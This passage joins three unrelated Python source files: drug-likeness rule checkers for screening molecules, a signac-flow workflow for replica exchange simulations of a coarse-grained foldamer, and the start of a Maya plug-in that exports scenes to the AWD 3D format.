    def CheckLipinskiRule(self):
        """
        Check molecules under Lipinski's rule.
        Reference:
            Lipinski et al., Advanced drug delivery reviews 23.1-3 (1997): 3-25.
        Rule details:
            MW <= 500
            logP <= 5
            nHD <= 5
            nHA <= 10
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckLipinskiRule)

    def CheckBeyondRo5(self):
        """
        Check molecules under beyond-Ro5 rule.
        Reference:
            Doak et al., Journal of medicinal chemistry 59.6 (2015): 2312-2327.
        Rule details:
            MW <= 1000
            -2 <= logP <= 10
            nHD <= 6
            nHA <= 15
            PSA <= 250
            nRot <= 20
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckBeyondRo5)

    def CheckPfizerRule(self):
        """
        Check molecules under Pfizer rule (3/75 rule).
        Reference:
            Hughes et al., Bioorganic & medicinal chemistry letters 18.17 (2008): 4872-4875.
        Rule details:
            logP > 3
            TPSA < 75
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckPfizerRule)

    def CheckGSKRule(self):
        """
        Check molecules under GSK rule (4/400 rule).
        Reference:
            Journal of medicinal chemistry 51.4 (2008): 817-834.
        Rule details:
            MW <= 400
            logP <= 4
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckGSKRule)

    def CheckOralMacrocycles(self):
        """
        Check molecules under oral macrocycles rules.
        Reference:
            Giordanetto & Kihlberg, Journal of medicinal chemistry 57.2 (2013): 278-295.
        Rule details:
            MW < 1000
            logP < 10
            nHD < 5
            TPSA < 250
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckOralMacrocycles)

    def CheckOpreaRule(self):
        """
        Reference:
            Oprea, Tudor I., Journal of computer-aided molecular design 14.3 (2000): 251-264.
        Rule details:
            nRing >= 3
            nRig >= 18
            nRot >= 6
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckOpreaRule)

    def CheckGhoseRule(self):
        """
        Check molecules under Ghose rule.
        Reference:
            Ghose et al., Journal of combinatorial chemistry 1.1 (1999): 55-68.
        Rule details:
            -0.4 < logP < 5.6
            160 < MW < 480
            40 < MR < 130
            20 < nAtom < 70
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckGhoseRule)

    def CheckREOS(self):
        """
        Check molecules under the REOS program.
        Reference:
            Walters & Murcko, Nat Rev Drug Discov, 2.4 (2003): 259.
        Rule details:
            200 <= MW <= 500
            -5 <= logP <= 5
            nHD <= 5
            nHA <= 10
            nRot <= 8
            TPSA <= 150
            -4 <= fChar <= 4
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckREOS)

    def CheckGoldenTriangle(self):
        """
        Check molecules under the 'Golden Triangle'.
        Reference:
            Johnson et al., Bioorg Med Chem Lett, 19.19 (2009): 5560-5564.
        Rule details:
            200 <= MW <= 500
            -2 <= logD <= 5
        NOTE(review): intentionally unimplemented -- the corresponding
        rulesfilter.CheckGoldenTriangle checker appears unavailable;
        restore ``return self._scan(rulesfilter.CheckGoldenTriangle)``
        once it exists.
        """
        pass

    def CheckXuRule(self):
        """
        Check molecules under Xu's rule.
        Rule details:
            nHD <= 5
            nHA <= 10
            3 <= nRot <= 35
            1 <= nRing <= 7
            10 <= nHev <= 50
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckXuRule)

    def CheckSchneiderRule(self):
        """
        Check molecules under the Schneider rule.
        Reference:
            Schneider, Nadine, et al., J Chem Inf Model, 48.3 (2008): 613-628.
        Rule details:
            MW > 230
            nHD > 0
            nHA > 0
            nRot > 0
            nRing > 0
            MR > 40
            functional groups > 0
            molecular volume > 191
        NOTE(review): intentionally unimplemented -- no matching
        rulesfilter checker is available yet.
        """
        pass

    def CheckRo4(self):
        """
        Rule details:
            MW <= 400
            logP <= 4
            nHD <= 4
            nHA <= 8
            TPSA <= 120
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckRo4)

    def CheckRo3(self):
        """
        Check molecules under Ro3.
        Reference:
            Congreve, Miles, et al., Drug discovery today 19.8 (2003): 876-877.
        Rule details:
            MW <= 300
            -3 <= logP <= 3
            nHD <= 3
            nHA <= 6
            PSA <= 60
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckRo3)

    def CheckRo2(self):
        """
        Check molecules under Ro2.
        Reference:
            Goldberg et al., Drug Discovery Today 20.1 (2015): 11-17.
        Rule details:
            MW <= 200
            logP <= 2
            nHD <= 2
            nHA <= 4
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckRo2)

    def CheckCNS(self):
        """
        Check molecules under the CNS rule.
        Reference:
            Jeffrey, Phil, et al., Neurobiol Dis, 37.1 (2010): 33-37.
        Rule details:
            135 <= MW <= 582
            -0.2 <= logP <= 6.1
            nHA <= 5
            nHD <= 3
            3 <= TPSA <= 118
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckCNS)

    def CheckRespiratory(self):
        """
        Check molecules under the Respiratory rule.
        Reference:
            Ritchie et al., J Chem Inf Model, 49.4 (2009): 1025-1032.
        Rule details:
            240 <= MW <= 520
            -2.0 <= logP <= 4.7
            6 <= nHB <= 12
            51 <= TPSA <= 135
            3 <= nRot <= 8
            1 <= nRing <= 5
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckRespiratory)
if __name__ == '__main__':
    # Demo: screen a small panel of example molecules with the Lipinski
    # rule using four worker processes, then show the first few results.
    demo_smiles = [
        'C1=CC=CC(C(Br)C)=C1',
        'C1=CC2NC(=O)CC3C=2C(C(=O)C2C=CC=CC=23)=C1',
        'C1=CC=C2C(=O)C3C=CNC=3C(=O)C2=C1',
        'C1=NC(CCN)=CN1',
        'C1CCCC(CCO)C1',
        'C1=CC=C2N=C(O)C=CC2=C1',
        'C(OC)1=C(C)C=C2OC[C@]([H])3OC4C(C)=C(OC)C=CC=4C(=O)[C@@]3([H])C2=C1C',
        'C1=C2N=CC=NC2=C2N=CNC2=C1',
        'C1=C(O)C=CC(O)=C1',
        'CCC1(c2ccccc2)C(=O)NC(=O)NC1=O',
        'N1=CN=CN=C1',
        'C1=C2C=CC=CC2=CC2C=CC=CC1=2',    # NonGenotoxic_Carcinogenicity
        'C1=CC=C2C(=O)CC(=O)C2=C1',       # Pains
        'C1=CC=CC(COCO)=C1',              # Potential_Electrophilic
        'N1=NC=CN1C=O',                   # Promiscuity
        'CC(=O)OC(=O)C1C=COC1',           # Skin_Sensitization
        'S',
        'CCCCC(=O)[H]',                   # Biodegradable
        'C1=CN=C(C(=O)O)C=C1',            # Chelating
        'C(OC)1=CC=C2OCC3OC4C=C(OC)C=CC=4C(=O)C3C2=C1',
        'C1=C2N=CC=NC2=C2N=CNC2=C1',      # Genotoxic_Carcinogenicity_Mutagenicity
        'N(CC)(CCCCC)C(=S)N',             # Idiosyncratic
    ]
    demo_mols = [Chem.MolFromSmiles(smi) for smi in demo_smiles]
    scanner = PC_rules(demo_mols, n_jobs=4, detail=True)
    lipinski_results = scanner.CheckLipinskiRule()
    print(len(lipinski_results))
    print(lipinski_results[:3])
# ===========================================================================
# examples/signac_HPC/project.py
# project.py
import signac
from flow import FlowProject
import os
from simtk import unit
from cg_openmm.cg_model.cgmodel import CGModel
from cg_openmm.parameters.reweight import get_temperature_list
from cg_openmm.simulation.rep_exch import *
from analyze_foldamers.ensembles.cluster import *
from analyze_foldamers.parameters.bond_distributions import *
from analyze_foldamers.parameters.angle_distributions import *
from openmmtools.cache import global_context_cache
from openmmtools.multistate import ReplicaExchangeSampler
import numpy as np
import simtk.openmm as openmm
import pickle
from cg_openmm.thermo.calc import *
# Operation groups so related operations can be run/submitted together.
replica_exchange_group = FlowProject.make_group(name='replica_exchange')
analysis_group = FlowProject.make_group(name='analysis')
# Directory the project script is launched from; used to locate the shared
# initial-structure PDB file.
proj_directory = os.getcwd()
@FlowProject.label
def run_replica_exchange_done(job):
    """Label: True once the replica exchange simulation for this job has
    run to completion, according to the sampler status stored in
    <workspace>/output/output.nc."""
    output_directory = os.path.join(job.workspace(), "output")
    output_data = os.path.join(output_directory, "output.nc")
    # Boolean flag (the original initialized it as the int 0).
    rep_exch_completed = False
    if os.path.isfile(output_data):
        rep_exch_status = ReplicaExchangeSampler.read_status(output_data)
        rep_exch_completed = rep_exch_status.is_completed
    return rep_exch_completed
@FlowProject.label
def process_replica_exchange_done(job):
    # True once per-state DCD trajectories exist; state_36 (the highest of
    # the 36 states) serves as the completion marker.
    return job.isfile("output/state_36.dcd")
@FlowProject.label
def heat_capacity_done(job):
    # True once signac_calc_heat_capacity has written its plot.
    return job.isfile("output/heat_capacity.pdf")
@FlowProject.label
def state_trajectories_created(job):
    # True once at least the first per-state DCD trajectory exists.
    return job.isfile("output/state_1.dcd")
@FlowProject.label
def clustering_done(job):
    # True once signac_clustering has written the minimized native medoid.
    return job.isfile("output/native_medoid_min.pdb")
@FlowProject.label
def ramachandran_done(job):
    """Label: True once the ramachandran plot has been generated."""
    # BUG FIX: signac_ramachandran writes 'output/ramachandran.pdf'; the
    # original checked for a '.pdb' file that is never created, so this
    # label could never become True.
    return job.isfile("output/ramachandran.pdf")
@FlowProject.label
def bonded_distributions_done(job):
    # True once signac_bonded_distributions has written the bond plot.
    return job.isfile("output/bonds_all_states.pdf")
@replica_exchange_group
@FlowProject.operation
@FlowProject.post(run_replica_exchange_done)
def signac_run_replica_exchange(job):
    """Build a 24-monomer (1 backbone + 1 sidechain bead) coarse-grained
    model from this job's statepoint parameters and run a 36-replica
    exchange simulation, writing results to <workspace>/output/output.nc
    and the model itself to stored_cgmodel.pkl."""
    # Run replica exchange simulation for current job parameters
    # equil_bond_angle = job.sp.theta
    # equil_torsion_angle = job.sp.alpha
    # Job settings
    output_directory = os.path.join(job.workspace(), "output")
    if not os.path.exists(output_directory):
        os.mkdir(output_directory)
    overwrite_files = True  # overwrite files.
    # Run on the GPU; all replicas share the CUDA context cache.
    global_context_cache.platform = openmm.Platform.getPlatformByName("CUDA")
    # Replica exchange simulation settings
    total_simulation_time = 20.0 * unit.nanosecond
    simulation_time_step = 5.0 * unit.femtosecond
    # NOTE(review): total_steps is computed but not used below.
    total_steps = int(np.floor(total_simulation_time / simulation_time_step))
    output_data = os.path.join(output_directory, "output.nc")
    number_replicas = 36
    min_temp = 200.0 * unit.kelvin
    max_temp = 500.0 * unit.kelvin
    temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
    exchange_frequency = 200  # Number of steps between exchange attempts
    collision_frequency = 5 / unit.picosecond
    # Force-field feature toggles for the CG model.
    include_bond_forces = True
    include_bond_angle_forces = True
    include_nonbonded_forces = True
    include_torsion_forces = True
    constrain_bonds = False
    mass = 100.0 * unit.amu
    # mass and charge are defaults.
    # Backbone (bb) and sidechain (sc) bead definitions; both share the
    # statepoint's LJ sigma/epsilon.
    bb = {
        "particle_type_name": "bb",
        "sigma": job.sp.sigma * unit.angstrom,
        "epsilon": job.sp.epsilon * unit.kilojoules_per_mole,
        "mass": mass
    }
    sc = {
        "particle_type_name": "sc",
        "sigma": job.sp.sigma * unit.angstrom,
        "epsilon": job.sp.epsilon * unit.kilojoules_per_mole,
        "mass": mass
    }
    # Monomer definition
    A = {
        "monomer_name": "A",
        "particle_sequence": [bb, sc],
        "bond_list": [[0, 1]],
        "start": 0,
        "end": 0,
    }
    sequence = 24 * [A]
    # Bond definitions
    bond_lengths = {"default_bond_length": job.sp.equil_bond_length * unit.nanometer}
    bond_force_constants = {
        "default_bond_force_constant": job.sp.k_bond * unit.kilojoule_per_mole / unit.nanometer / unit.nanometer
    }
    # Bond angle definitions
    bond_angle_force_constants = {
        "default_bond_angle_force_constant": job.sp.k_angle * unit.kilojoule_per_mole / unit.radian / unit.radian
    }
    equil_bond_angles = {
        "default_equil_bond_angle": job.sp.equil_bond_angle_bb_bb_sc * unit.degrees,
        "bb_bb_bb_equil_bond_angle": job.sp.equil_bond_angle_bb_bb_bb * unit.degrees}
    # torsion angle definitions
    torsion_force_constants = {
        "default_torsion_force_constant": 0.0 * unit.kilojoule_per_mole,
        "bb_bb_bb_bb_torsion_force_constant": job.sp.k_torsion * unit.kilojoule_per_mole}
    torsion_phase_angles = {
        "sc_bb_bb_sc_torsion_phase_angle": 0 * unit.degrees,
        "bb_bb_bb_bb_torsion_phase_angle": job.sp.torsion_phase_angle_bb_bb_bb_bb * unit.degrees,
        "bb_bb_bb_sc_torsion_phase_angle": 0 * unit.degrees,
    }
    torsion_periodicities = {
        "sc_bb_bb_sc_torsion_periodicity": job.sp.torsion_periodicity,
        "bb_bb_bb_bb_torsion_periodicity": job.sp.torsion_periodicity,
        "bb_bb_bb_sc_torsion_periodicity": job.sp.torsion_periodicity,
    }
    # Get initial positions from local file
    # NOTE(review): PDBFile is assumed to come in via one of the wildcard
    # imports (cg_openmm / openmm tool modules) -- confirm.
    pdb_path = os.path.join(proj_directory, "24mer_1b1s_initial_structure.pdb")
    positions = PDBFile(pdb_path).getPositions()
    # Build a coarse grained model
    cgmodel = CGModel(
        particle_type_list=[bb, sc],
        bond_lengths=bond_lengths,
        bond_force_constants=bond_force_constants,
        bond_angle_force_constants=bond_angle_force_constants,
        torsion_force_constants=torsion_force_constants,
        equil_bond_angles=equil_bond_angles,
        torsion_phase_angles=torsion_phase_angles,
        torsion_periodicities=torsion_periodicities,
        include_nonbonded_forces=include_nonbonded_forces,
        include_bond_forces=include_bond_forces,
        include_bond_angle_forces=include_bond_angle_forces,
        include_torsion_forces=include_torsion_forces,
        constrain_bonds=constrain_bonds,
        sequence=sequence,
        positions=positions,
        monomer_types=[A],
    )
    # store the cg model so that we can do various analyses.
    cgmodel.export(job.fn("stored_cgmodel.pkl"))
    # overwrite_files is hard-coded True above, so in practice the
    # simulation always (re-)runs and the else branch is unreachable.
    if not os.path.exists(output_data) or overwrite_files == True:
        run_replica_exchange(
            cgmodel.topology,
            cgmodel.system,
            cgmodel.positions,
            friction=collision_frequency,
            temperature_list=temperature_list,
            simulation_time_step=simulation_time_step,
            total_simulation_time=total_simulation_time,
            exchange_frequency=exchange_frequency,
            output_data=output_data,
        )
    else:
        print("Replica output files exist")
@replica_exchange_group
@FlowProject.operation
@FlowProject.pre(run_replica_exchange_done)
@FlowProject.post(process_replica_exchange_done)
def signac_process_replica_exchange(job):
    """Detect equilibration / decorrelation in the replica exchange data,
    persist those statistics to analysis_stats.pkl, and write replica- and
    state-sorted DCD trajectories for downstream analysis operations."""
    # Process replica exchange data
    analysis_stats = {}
    # Job settings
    output_directory = os.path.join(job.workspace(), "output")
    output_data = os.path.join(output_directory, "output.nc")
    cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"), "rb"))
    replica_energies, replica_positions, replica_states, production_start, sample_spacing = process_replica_exchange_data(
        output_data=output_data,
        output_directory=output_directory,
        write_data_file=False,
        detect_equilibration=True,
    )
    # Persist equilibration frame and decorrelation spacing for the
    # analysis operations (heat capacity, clustering, distributions).
    analysis_stats["production_start"] = production_start
    analysis_stats["energy_decorrelation"] = sample_spacing
    pickle_out = open(job.fn("analysis_stats.pkl"), "wb")
    pickle.dump(analysis_stats, pickle_out)
    pickle_out.close()
    # NOTE(review): timestep / time_interval below must match the
    # simulation settings in signac_run_replica_exchange (5 fs step,
    # 200-step exchange frequency) -- keep them in sync.
    make_replica_dcd_files(
        cgmodel.topology,
        replica_positions,
        timestep=5 * unit.femtosecond,
        time_interval=200,
        output_dir=output_directory
    )
    make_state_dcd_files(
        cgmodel.topology,
        replica_positions,
        replica_states,
        timestep=5 * unit.femtosecond,
        time_interval=200,
        output_dir=output_directory
    )
@analysis_group
@FlowProject.operation
@FlowProject.pre(process_replica_exchange_done)
@FlowProject.post(heat_capacity_done)
def signac_calc_heat_capacity(job):
    """Compute the heat capacity curve C_v(T) from the replica exchange
    energies, save C_v, dC_v and the evaluated temperature list to
    job.data, and print a small table of the results."""
    # Calculate heat capacity curve
    # Job settings
    output_directory = os.path.join(job.workspace(), "output")
    output_data = os.path.join(output_directory, "output.nc")
    # Replica exchange simulation settings.
    # These must match the simulations that are being analyzed.
    number_replicas = 36
    min_temp = 200.0 * unit.kelvin
    max_temp = 500.0 * unit.kelvin
    temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
    # Load in trajectory stats:
    analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"), "rb"))
    # Read the simulation coordinates for individual temperature replicas;
    # one intermediate state is inserted between each sampled temperature.
    C_v, dC_v, new_temperature_list = get_heat_capacity(
        temperature_list,
        output_data=output_data,
        frame_begin=analysis_stats["production_start"],
        sample_spacing=analysis_stats["energy_decorrelation"],
        num_intermediate_states=1,
        plot_file=f"{output_directory}/heat_capacity.pdf",
    )
    # Save C_v data to data file:
    job.data['C_v'] = C_v
    job.data['dC_v'] = dC_v
    job.data['T_list_C_v'] = new_temperature_list
    print(f"T({new_temperature_list[0].unit}) Cv({C_v[0].unit}) dCv({dC_v[0].unit})")
    for i, C in enumerate(C_v):
        print(f"{new_temperature_list[i]._value:>8.2f}{C_v[i]._value:>10.4f} {dC_v[i]._value:>10.4f}")
@analysis_group
@FlowProject.operation
@FlowProject.pre(process_replica_exchange_done)
@FlowProject.post(clustering_done)
def signac_clustering(job):
    """Predict a native structure via DBSCAN rmsd clustering of the
    trajectories, then energy-minimize the medoid of the lowest-rmsd
    cluster and store positions/energies in job.data."""
    # Predict native structure from rmsd clustering:
    output_directory = os.path.join(job.workspace(), "output")
    # Load in cgmodel:
    cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"), "rb"))
    # Load in trajectory stats:
    analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"), "rb"))
    # NOTE(review): dcd_file_list_rep, frame_end and filter_ratio are not
    # defined anywhere in this function or at module scope, so this
    # operation raises NameError as written. They presumably should be
    # built here (list of replica DCD paths, final frame index, filtering
    # ratio) -- confirm and fix before running.
    medoid_positions, cluster_sizes, cluster_rmsd, n_noise, silhouette_avg = get_cluster_medoid_positions_DBSCAN(
        file_list=dcd_file_list_rep,
        cgmodel=cgmodel,
        min_samples=50,
        eps=0.1,
        frame_start=analysis_stats["production_start"],
        frame_stride=50,
        frame_end=frame_end,
        filter=True,
        filter_ratio=filter_ratio,
        output_dir=output_directory,
    )
    job.data['cluster_sizes'] = cluster_sizes
    job.data['noise_points'] = n_noise
    job.data['cluster_rmsd'] = cluster_rmsd
    job.data['avg_silhouette'] = silhouette_avg
    # Choose the medoid cluster with the smallest rmsd as the native structure.
    k_min = np.argmin(cluster_rmsd)
    # Minimize energy of native structure
    positions, PE_start, PE_end, simulation = minimize_structure(
        cgmodel,
        medoid_positions[k_min],
        output_file=f"{output_directory}/native_medoid_min.pdb",
    )
    job.data['native_positions'] = medoid_positions[k_min]
    job.data['native_positions_min'] = positions
    job.data['native_PE'] = PE_start
    job.data['native_PE_min'] = PE_end
@analysis_group
@FlowProject.operation
@FlowProject.pre(state_trajectories_created)
@FlowProject.post(ramachandran_done)
def signac_ramachandran(job):
    """Make alpha-theta ramachandran plots from the per-state (constant
    temperature) trajectories of this job."""
    output_directory = os.path.join(job.workspace(), "output")
    # Load in trajectory stats:
    analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"), "rb"))
    # Load in cgmodel:
    cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"), "rb"))
    number_replicas = 36
    # BUG FIX: the original loop referenced an undefined name 'rep'
    # instead of the loop variable, raising NameError on first use.
    traj_file_list = [
        f"{output_directory}/state_{i + 1}.dcd" for i in range(number_replicas)
    ]
    rama_hist, xedges, yedges = calc_ramachandran(
        cgmodel,
        traj_file_list,
        plotfile=f"{output_directory}/ramachandran.pdf",
        frame_start=analysis_stats["production_start"],
    )
@analysis_group
@FlowProject.operation
@FlowProject.pre(state_trajectories_created)
@FlowProject.post(bonded_distributions_done)
def signac_bonded_distributions(job):
    """Plot bond-length, bond-angle and torsion distributions for every
    temperature state trajectory of this job."""
    output_directory = os.path.join(job.workspace(), "output")
    # Load in trajectory stats:
    analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"), "rb"))
    # Load in cgmodel:
    cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"), "rb"))
    # These must match the simulations being analyzed:
    number_replicas = 36
    min_temp = 200.0 * unit.kelvin
    max_temp = 500.0 * unit.kelvin
    temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
    traj_file_list = [
        f"{output_directory}/state_{i + 1}.dcd" for i in range(number_replicas)
    ]
    bond_hist_data = calc_bond_length_distribution(
        cgmodel, traj_file_list,
        frame_start=analysis_stats["production_start"],
        temperature_list=temperature_list,
        plotfile=f"{output_directory}/bonds_all_states.pdf")
    angle_hist_data = calc_bond_angle_distribution(
        cgmodel, traj_file_list,
        frame_start=analysis_stats["production_start"],
        temperature_list=temperature_list,
        plotfile=f"{output_directory}/angles_all_states.pdf")
    # BUG FIX: the torsion result previously overwrote bond_hist_data.
    torsion_hist_data = calc_torsion_distribution(
        cgmodel, traj_file_list,
        frame_start=analysis_stats["production_start"],
        temperature_list=temperature_list,
        plotfile=f"{output_directory}/torsions_all_states.pdf")
if __name__ == '__main__':
    # Hand control to signac-flow's CLI (run / submit / status ...).
    FlowProject().main()
# ===========================================================================
import re
import sys
import math
import os.path
from time import time
import maya.OpenMaya as om
import maya.cmds as mc
import maya.OpenMayaAnim as omanim
import maya.OpenMayaMPx as OpenMayaMPx
import pymel.core.datatypes
import pyawd
from pyawd.core import *
from pyawd.anim import *
from pyawd.scene import *
from pyawd.geom import *
from pyawd.material import *
from pyawd.utils.math import *
# Wall-clock time at which the current benchmark started (0.0 = idle).
b_start = 0.0


def benchmark_start():
    """Record the current wall-clock time as the benchmark start point."""
    global b_start
    b_start = time()


def benchmark_stop():
    """Return seconds elapsed since benchmark_start() and reset the timer."""
    global b_start
    elapsed = time() - b_start
    b_start = 0.0
    return elapsed


def benchmark_print():
    """Stop the running benchmark and print its duration."""
    print('Duration: %fs' % benchmark_stop())
class MayaAWDFileTranslator(OpenMayaMPx.MPxFileTranslator):
    """Maya file translator that exports the current scene to the AWD
    format, optionally copying a SWF preview viewer next to the output."""

    def writer(self, file, options, mode):
        """Export the scene to the AWD file described by `file`.

        :param file: MFileObject describing the destination path
        :param options: ';'-prefixed, '&'-separated key=value option string
            produced by the export UI
        :param mode: Maya export mode (unused here)
        """
        file_path = file.resolvedFullName()
        base_path = os.path.dirname(file_path)
        opts = self.parse_opts(options)

        def o(key, defval=None):
            'Get option or default value'
            if key in opts:
                return opts[key]
            else:
                return defval

        with open(file_path, 'wb') as file:
            comp_str = o('compression', 'none')
            compression = UNCOMPRESSED
            if comp_str == 'deflate':
                compression = DEFLATE
            elif comp_str == 'lzma':
                compression = LZMA
            wide_mtx = int(o('wide_mtx', False))
            wide_geom = int(o('wide_geom', False))
            exporter = MayaAWDExporter(file, compression, wide_geom=wide_geom, wide_mtx=wide_mtx)
            # NOTE(review): option values arrive as strings, so bool('0')
            # is True -- these flags are effectively "present means on".
            # Confirm the UI omits unset keys before changing this.
            exporter.include_geom = bool(o('inc_geom', False))
            exporter.include_scene = bool(o('inc_scene', False))
            exporter.flatten_untransformed = bool(o('flatten_untransformed', False))
            exporter.replace_exrefs = bool(o('replace_exrefs', False))
            exporter.include_uvanim = bool(o('inc_uvanim', False))
            exporter.include_skelanim = bool(o('inc_skelanim', False))
            exporter.include_skeletons = bool(o('inc_skeletons', False))
            exporter.include_materials = bool(o('inc_materials', False))
            exporter.include_cameras = bool(o('inc_cams', False))
            exporter.include_lights = bool(o('inc_lights', False))
            exporter.embed_textures = bool(o('embed_textures', False))
            exporter.alpha_blending = bool(o('alpha_blending', False))
            exporter.alpha_threshold = float(o('alpha_threshold', 0.0))
            exporter.include_attr = bool(o('inc_attr', False))
            if exporter.include_attr:
                exporter.user_ns = AWDNamespace(str(o('attrns', '')))
            if exporter.include_skelanim:
                exporter.animation_sequences = self.read_sequences(o('seqsrc'), base_path)
            exporter.joints_per_vert = int(o('jointspervert', 3))
            exporter.export(None)

        # Copy viewer if preview should be created (done after the AWD
        # file has been closed).
        create_preview = int(o('create_preview', 0))
        if create_preview:
            import shutil
            import subprocess
            pyawd_path = pyawd.__path__[0]
            viewer_path = os.path.normpath(os.path.join(pyawd_path, '..', 'mayaawd'))
            out_path = os.path.dirname(file_path)
            out_name = os.path.basename(os.path.splitext(file_path)[0])
            # Pick the right SWF file depending on desired sandbox model
            prev_sandbox = int(o('preview_sandbox', 1))
            if prev_sandbox == 1:
                viewer_name = 'viewer_l.swf'
            else:
                viewer_name = 'viewer_n.swf'
            shutil.copyfile(os.path.join(viewer_path, viewer_name), os.path.join(out_path, 'viewer.swf'))
            shutil.copyfile(os.path.join(viewer_path, 'swfobject.js'), os.path.join(out_path, 'swfobject.js'))
            html_template = os.path.join(viewer_path, 'template.html')
            html_output = os.path.splitext(file_path)[0] + '.html'
            # TODO: Fetch color from options
            bg_color = '000000'
            with open(html_template, 'r') as html_in:
                with open(html_output, 'w') as html_out:
                    for line in html_in:
                        line = line.replace('%NAME%', out_name)
                        line = line.replace('%COLOR%', bg_color)
                        html_out.write(line)
            try:
                # Windows?
                os.startfile(html_output)
            except AttributeError:
                # Mac OS X
                subprocess.call(['open', html_output])

    def defaultExtension(self):
        """File extension Maya appends to exported files."""
        return 'awd'

    def haveWriteMethod(self):
        """Tell Maya this translator supports exporting."""
        return True

    def parse_opts(self, opt_str):
        """Parse Maya's option string into a dict.

        The string looks like ';key1=val1&key2=val2'; '&'/'=' separators
        escaped with a backslash are ignored.
        """
        opt_str = str(opt_str)
        if opt_str.startswith(';'):
            opt_str = opt_str[1:]
        # BUG FIX: skip empty fields so an empty option string returns {}
        # instead of raising (previously opt_str[0] raised IndexError and
        # dict([['']]) raised ValueError).
        fields = [f for f in re.split(r'(?<!\\)&', opt_str) if f]
        return dict([re.split(r'(?<!\\)=', pair) for pair in fields])

    def read_sequences(self, seq_path, base_path):
        """Read an animation-sequence definition file.

        Each non-comment line is 'name start end'; returns a list of
        (name, start_frame, end_frame) tuples, or [] when the file cannot
        be found or parsed (export then proceeds without animation).
        """
        sequences = []
        if seq_path is not None:
            if not os.path.isabs(seq_path):
                # Look for this file in a list of different locations,
                # and use the first one in which it exists.
                existed = False
                bases = [
                    mc.workspace(q=True, rd=True),
                    os.path.join(mc.workspace(q=True, rd=True), mc.workspace('mayaAscii', q=True, fre=True)),
                    os.path.join(mc.workspace(q=True, rd=True), mc.workspace('AWD2', q=True, fre=True)),
                    base_path
                ]
                for base in bases:
                    new_path = os.path.join(base, seq_path)
                    print('Looking for sequence file in %s' % new_path)
                    if os.path.exists(new_path) and os.path.isfile(new_path):
                        existed = True
                        seq_path = new_path
                        break
                if not existed:
                    # BUG FIX: the closing quote of the path was misplaced
                    # in the original message.
                    mc.warning('Could not find sequence file "%s". Will not export animation.' % seq_path)
                    return []
            try:
                with open(seq_path, 'r') as seqf:
                    lines = seqf.readlines()
                    for line in lines:
                        # Skip comments
                        if line[0] == '#':
                            continue
                        line_fields = re.split('[^a-zA-Z0-9]', line.strip())
                        sequences.append((line_fields[0], int(line_fields[1]), int(line_fields[2])))
            except (EnvironmentError, ValueError, IndexError):
                # Previously a bare 'except: pass'; keep the best-effort
                # behavior but surface the failure instead of hiding it.
                mc.warning('Could not read sequence file "%s"' % seq_path)
        return sequences
def ftCreator():
    """Factory handed to Maya when registering the AWD file translator."""
    translator = MayaAWDFileTranslator()
    return OpenMayaMPx.asMPxPtr(translator)
def initializePlugin(mobject):
    """Maya plug-in entry point: register the AWD2 file translator."""
    plugin_fn = OpenMayaMPx.MFnPlugin(mobject, 'Away3D', '1.0')
    return plugin_fn.registerFileTranslator('AWD2', 'none', ftCreator, 'MayaAWDExporterUI')
def uninitializePlugin(mobject):
    """Maya plug-in exit point: deregister the AWD2 file translator."""
    plugin_fn = OpenMayaMPx.MFnPlugin(mobject)
    return plugin_fn.deregisterFileTranslator('AWD2')
class MayaAWDBlockCache:
    """Maps Maya DAG paths to the AWD blocks already created for them.

    Check the cache before creating a new block so blocks can be reused
    within the exported file when possible. The first block registered
    for a path wins; later add() calls for the same path are ignored.
    """

    def __init__(self):
        self._entries = []

    def get(self, path):
        """Return the cached block for `path`, or None if absent."""
        for cached_path, cached_block in self._entries:
            if cached_path == path:
                return cached_block
        return None

    def add(self, path, block):
        """Register `block` under `path` unless one is already cached."""
        if self.get(path) is None:
            self._entries.append((path, block))
class MayaAWDExporter:
    """Exports the Maya scene graph (meshes, cameras, containers, materials,
    skeletons and animation) into an AWD document via the pyawd API.

    Typical use: construct, enable the relevant include_* flags, then call
    export().

